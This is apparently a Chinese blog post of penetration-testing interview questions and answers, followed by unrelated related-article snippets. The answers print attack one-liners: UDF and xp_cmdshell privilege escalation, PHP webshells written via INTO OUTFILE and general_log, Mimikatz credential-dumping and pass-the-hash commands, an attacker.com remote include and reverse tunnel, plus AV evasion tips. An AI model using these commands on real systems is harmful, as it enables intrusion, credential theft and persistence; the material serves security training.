2025年渗透测试面试题总结-2025年HW(护网面试) 47(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 47

1. UDF提权

2. 命令执行与代码执行的区别

3. 文件包含利用姿势

4. 漏洞复现流程

5. SQL Server注入相关

6. 预编译如何绕过SQL注入

7. 内网正向代理与反向代理

8. Mimikatz使用

9. 目标出不了内网的解决方案

10. 绕过disable_function方法

11. MySQL写Shell方法

12. Redis漏洞利用

13. SQLMap os-shell写入文件

14. 最近研究方向

15. 免杀技术(Bypass AV/EDR)

16. Java反序列化漏洞

 2025年HW(护网面试) 47

1、udf提权
2、命令执行与代码执行的区别
3、文件包含利用姿势
4、漏洞复现
5、sqlserver的注入相关
6、预编译怎么进行sql注入
7、内网的正向代理和反向代理
8、mimikatz的使用
9、目标出不了内网咋办
10、如何绕过disable_function
11、mysql进行写shell的方法
12、redis的漏洞利用相关
13、sqlmap的os-shell写了哪些文件
14、最近在研究啥
15、免杀
16、java的相关的反系列化

1. UDF提权

  • 原理:利用MySQL自定义函数(UDF)加载恶意共享库(.so/.dll),执行系统命令。
  • 步骤
    1. 上传编译好的UDF库(如lib_mysqludf_sys.so )到插件目录。
    2. 创建UDF函数:CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.so';
    3. 执行命令:SELECT sys_exec('id');
  • 条件
    • MySQL有FILE权限且secure_file_priv为空。
    • 知晓服务器绝对路径。
  • 防御:限制FILE权限,设置secure_file_priv,禁用动态库加载。

2. 命令执行与代码执行的区别

类型命令执行(RCE)代码执行
执行环境直接调用操作系统命令(如/bin/sh在编程语言解释器中执行代码(如PHP的eval()
危害范围影响整个系统受限于语言环境(如PHP沙盒)
示例函数system(), exec()eval(), assert()

3. 文件包含利用姿势

  1. 本地文件包含(LFI)
    • 读取敏感文件:/etc/passwd、配置文件。
    • 结合日志注入:包含Apache日志写入PHP代码。
  2. 远程文件包含(RFI)
    • 加载远程恶意脚本:http://attacker.com/shell.txt
  3. 协议利用
    • php://filter读取源码:php://filter/convert.base64-encode/resource=index.php
  4. 无回显利用
    • 触发错误日志或延时判断(盲注)。

4. 漏洞复现流程

  1. 环境搭建:使用Docker/Vulhub快速部署漏洞环境。
  2. 漏洞验证
    • 手工测试:构造Payload触发漏洞(如SQLi、XSS)。
    • 工具辅助:Burp Suite、SQLMap。
  3. 利用链构造:结合多个漏洞实现RCE(如LFI+日志注入)。
  4. 结果验证:获取Shell/敏感数据,记录复现步骤。

5. SQL Server注入相关

  • 堆叠查询'; EXEC xp_cmdshell 'whoami'--(需开启xp_cmdshell)。
  • 差异备份写Shell:利用备份功能写入ASPX木马。
  • 盲注函数WAITFOR DELAY '0:0:5'CHAR()
  • 权限提升EXEC sp_addsrvrolemember 'user', 'sysadmin'

6. 预编译如何绕过SQL注入

  • 预编译原理:SQL语句与参数分离,避免拼接。
  • 绕过场景
    1. 二次注入:参数入库后被其他功能拼接使用。
    2. 非参数化部分:如ORDER BY后接动态字段名。
    3. 存储过程动态SQL:内部使用EXEC()执行拼接语句。

7. 内网正向代理与反向代理

类型正向代理反向代理
角色客户端主动连接代理访问目标服务端通过代理接收外部请求
渗透应用内网穿透(如SSH -L端口转发)隐藏内网服务(Nginx反向代理)
工具frp、ProxychainsNgrok、Cobalt Strike

8. Mimikatz使用

  • 常用命令
    1. 抓取明文密码:sekurlsa::logonpasswords
    2. 导出Kerberos票据:kerberos::list /export
    3. PTH攻击:sekurlsa::pth /user:admin /domain:test /ntlm:xxxx
  • 绕过防御
    • 使用内存加载(无文件执行)。
    • 禁用LSASS保护检测(需管理员权限)。

9. 目标出不了内网的解决方案

  1. DNS隧道:使用dnscat2传输数据。
  2. ICMP隧道:icmpsh或PingTunnel。
  3. 端口转发
    • 正向代理:ssh -L 8080:内网IP:80 user@跳板机
    • 反向代理:plink -R 4444:localhost:80 attacker.com
  4. Web通道:利用HTTP长连接传输数据(如ReGeorg)。

10. 绕过disable_function方法

  1. LD_PRELOAD劫持:通过恶意so文件劫持函数调用。
  2. ImageMagick漏洞:利用CVE-2016-3714执行命令。
  3. FFI扩展:PHP 7.4+的FFI接口直接调用系统函数。
  4. COM组件(Windows)new COM("WScript.Shell")执行命令。

11. MySQL写Shell方法

  1. INTO OUTFILE
    sqlSELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/shell.php'; 
  2. 日志文件写入
    sqlSET global general_log_file='/var/www/shell.php'; SET global general_log=on; SELECT '<?php eval($_POST[cmd]); ?>'; 

12. Redis漏洞利用

  1. 未授权访问:直接执行CONFIG SET dir /var/www写入SSH密钥或Webshell。
  2. 主从复制RCE:伪造恶意主节点,同步加载恶意模块。
  3. Lua沙盒绕过:CVE-2022-0543执行系统命令。

13. SQLMap os-shell写入文件

  • MySQL:写入UDF库(如/usr/lib/mysql/plugin/udf.so )和临时Webshell。
  • MSSQL:通过xp_cmdshell生成Bat脚本或VBS脚本。
  • Oracle:利用DBMS_ADVISOR写入Java类文件。

14. 最近研究方向

  • AI模型安全:对抗样本攻击、模型逆向工程。
  • 云原生渗透:Kubernetes逃逸、Serverless函数漏洞。
  • 硬件安全:物联网设备固件分析、旁路攻击(如功耗分析)。

15. 免杀技术(Bypass AV/EDR)

  1. 静态免杀
    • 加密Shellcode(AES/XOR)。
    • 代码混淆(如Polymorphic代码)。
  2. 动态免杀
    • 内存加载(无文件执行)。
    • API调用混淆(如直接系统调用)。
  3. 工具:Cobalt Strike Artifact Kit、Shellter。

16. Java反序列化漏洞

  • 利用链
    1. Commons CollectionsInvokerTransformer链触发RCE。
    2. Fastjson:JNDI注入(如CVE-2021-45046)。
    3. JDK原生链AnnotationInvocationHandler
  • 防御:升级依赖库,启用反序列化过滤器(JEP 290)。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.tpcf.cn/pingmian/89057.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

iPhone 数据擦除软件评测(最新且全面)

当您准备出售、捐赠或回收 iPhone 时&#xff0c;仅仅恢复出厂设置并不足以保证您的个人数据彻底消失。专业的 iPhone 数据擦除软件采用先进的技术&#xff0c;确保您的敏感信息永久无法恢复。本文回顾了十种流行的 iPhone 数据擦除工具&#xff0c;详细介绍了它们的功能、优点…

Qt 将触摸事件转换为鼠标事件(Qt4和Qt5及以上版本)

在Qt中&#xff0c;触摸事件&#xff08;QTouchEvent&#xff09;和鼠标事件&#xff08;QMouseEvent&#xff09;是两种不同的输入事件类型。通常情况下&#xff0c;触摸事件不会自动转换为鼠标事件&#xff0c;因为它们代表的是不同的输入设备&#xff08;触摸屏 vs 鼠标&…

Blender 云渲染高效流程:渲染 101 集群加速实战​

一、核心优势&#xff1a;适配 Blender 全场景需求​ ✅ 全渲染器深度兼容​ Cycles&#xff08;CPU/GPU 模式&#xff09;&#xff1a;云端 4090 显卡渲染速度比本地快 12 倍&#xff0c;支持 8K 分辨率 16K 纹理无压力​ Eevee 实时渲染&#xff1a;集群同步输出预览动画&am…

SQL学习记录01

什么是SQL&#xff1f; Structured Query Language &#xff08;结构化查询语言&#xff09;&#xff0c;与关系型数据库进行通信的标准语言。什么是数据库&#xff1f;“按照数据结构来组织、存储、和管理数据的仓库。”一个长期存储在计算机内的、有组织的、可共享的、统一管…

医疗项目如何应对法规变更?

医疗项目应对法规变更的关键策略包括建立法规监测体系、及时内部培训和沟通、调整业务流程和合规标准、技术系统快速迭代升级。 其中&#xff0c;建立有效的法规监测体系尤其重要。这意味着企业需要实时关注监管机构发布的政策更新和公告&#xff0c;迅速理解法规变化内容及对自…

AI Top10

AI 前十排名排名团队/机构名称国家核心优势领域1DeepMind英国强化学习、Alpha系列模型2OpenAI美国GPT系列、多模态大模型3DeepSeek中国高效NLP模型、开源生态建设4Google Brain美国Transformer架构、TensorFlow框架5Meta AI (FAIR)美国计算机视觉、Llama系列模型6NVIDIA Resear…

LabVIEW通知器函数应用

介绍LabVIEW通知器&#xff08;Notifier&#xff09;函数&#xff0c;演示两类并行循环通信场景&#xff1a;单对循环数据交互、多循环通知聚合&#xff0c;含程序框图&#xff08;数据发送 / 接收、多循环通知&#xff09;与前面板&#xff08;数据显示&#xff09;。功能说明…

推荐《Python 编程:从入门到实践》之Python编程的基础知识

在 Python 学习资源琳琅满目的当下&#xff0c;《Python 编程&#xff1a;从入门到实践》脱颖而出&#xff0c;堪称 Python 入门的不二之选。本书由经验丰富的教育工作者撰写&#xff0c;以清晰易懂的语言和循序渐进的方式&#xff0c;引领读者从 Python 的基础语法逐步迈向实际…

Kafka入门和基础配置

目录Kafka入门消息引擎系统ABC快速搞定Kafka术语kafka三层消息架构名词术语Kafka基础Kafka部署参考重要配置参数Broker端参数Topic级别参数JVM参数Kafka是消息引擎系统&#xff0c;也是分布式流处理平台Kafka入门 消息引擎系统ABC 民间版&#xff1a;系统 A 发送消息给消息引…

OPENPPP2 VEthernet 网络协议堆栈(CTCP)VNetStack 深度技术解析

&#x1f310; OPENPPP2 VEthernet 网络协议堆栈&#xff08;CTCP&#xff09;VNetStack 深度技术解析&#x1f3d7;️ 一、系统架构全景图 #mermaid-svg-FdlbKZCGQDDbvOL6 {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermai…

Gartner发布2025年中国网络安全成熟度曲线:网络安全的重点正转向保护AI、推动业务转型和增强组织韧性

网络安全的重点正转向保护人工智能、推动业务转型和增强组织韧性。首席信息官及其安全和风险管理主管可以利用这份技术成熟度曲线来识别实用且高价值的技术和实践&#xff0c;从而保持安全和敏捷。 战略规划假设 到2027年&#xff0c;60%的中国大型组织将在安全运营中心&#x…

网络准入控制系统的作用解析,2025年保障企业入网安全第一道防线

在当今数字化时代&#xff0c;网络已成为企业运营的基础&#xff0c;随着网络的广泛应用&#xff0c;网络准入控制系统作为保障网络安全的重要手段&#xff0c;正发挥着至关重要的作用。保障网络安全网络准入控制系统如同网络的忠诚卫士&#xff0c;它为网络大门安装了智能锁&a…

java基础(day09)

目录 1.继承的作用 2.继承树 3.protected和super protected super 注&#xff1a;super/this()--构造方法&#xff0c;第一行&#xff0c;一般不同时出现 4.向上向下转型 向上转型 向下转型 final 小结 1.继承的作用 理解&#xff1a;首先就是可以实现代码复用&#x…

如何进行选择。

初始理解问题 首先&#xff0c;我们需要明确题目在问什么。题目“House Robber”描述的是一个强盗在一排房屋前&#xff0c;每个房屋都有一定数量的钱。强盗不能连续抢劫两个相邻的房屋&#xff0c;否则会触发警报。目标是抢劫到最多的钱。 动态规划的思路 这个问题可以使用动态…

PHP语法高级篇(三):Cookie与会话

Cookie与会话在 Web 编程中十分实用&#xff1a;Cookie 能实现一周免登录&#xff0c;还能记住用户的主题偏好&#xff1b;会话可保存当前用户信息&#xff0c;也能临时存储购物车数据。本篇文章将记录Cookie与会话的学习过程。 一、Cookie cookie 常用于识别用户。cookie 是服…

11. JVM中的分代回收

1. JVM介绍和运行流程-CSDN博客 2. 什么是程序计数器-CSDN博客 3. java 堆和 JVM 内存结构-CSDN博客 4. 虚拟机栈-CSDN博客 5. JVM 的方法区-CSDN博客 6. JVM直接内存-CSDN博客 7. JVM类加载器与双亲委派模型-CSDN博客 8. JVM类装载的执行过程-CSDN博客 9. JVM垃圾回收…

基于PaddleOCR的营业执照识别与数据分析系统

基于PaddleOCR的营业执照识别与数据分析系统 1. 项目概述 本项目旨在利用百度PaddleOCR技术识别营业执照图片中的关键信息,结合自然语言处理(NLP)和卷积神经网络(CNN)对OCR结果进行分类处理,最后对识别出的收入流水数据进行深度分析与可视化展示。系统将实现从图像识别到数…

SpringBoot JSON字典序列化翻译

&#x1f9e9; 一、效果预期 Data public class UserVO {private String status;DictTranslate(type "user_status")private String statusName; }最终返回 JSON&#xff1a; {"status": "1","statusName": "启用" }&#…

基于Java+Maven+Testng+Selenium+Log4j+Allure+Jenkins搭建一个WebUI自动化框架(5)失败用例截图与重试

在UI自动化测试用例执行过程中&#xff0c;经常会有很多不确定的因素导致用例执行失败&#xff0c;比如网络原因、环境问题等&#xff0c;所以我们有必要引入重试机制&#xff08;失败重跑&#xff09;&#xff0c;来提高测试用例执行稳定性。准备工作&#xff1a;我们在进行失…

【Oracle】centos7静默安装oracle19c

静默安装三步骤&#xff1a; 1、数据库安装db_install.rsp&#xff08;数据库软件安装响应文件&#xff09;2、配置监听netca.rap&#xff08;监听配置响应文件&#xff09;3、建库dbca.rsp&#xff08;建库响应文件&#xff09;安装oracle19c先决条件准备&#xff1a; 1.检查主…